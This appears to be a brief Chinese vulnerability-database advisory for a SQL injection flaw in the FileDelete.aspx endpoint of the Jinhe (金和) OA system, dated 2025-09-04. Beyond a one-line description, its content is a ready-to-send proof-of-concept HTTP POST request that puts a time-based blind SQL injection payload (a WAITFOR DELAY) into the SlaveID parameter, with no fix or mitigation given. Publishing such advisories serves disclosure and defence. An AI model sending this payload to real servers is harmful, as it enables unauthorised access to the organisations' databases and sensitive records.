金和OA FileDelete.aspx SQL注入漏洞

日期: 2025-09-04 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和OA FileDelete.aspx 存在SQL注入漏洞,攻击者可构造恶意请求获取数据库敏感信息。

PoC代码

POST /c6/Jhsoft.Web.accept/FileDelete.aspx/ HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded

SlaveID=1')WAITFOR/**/DELAY'0:0:5'--/Temp/

相关漏洞推荐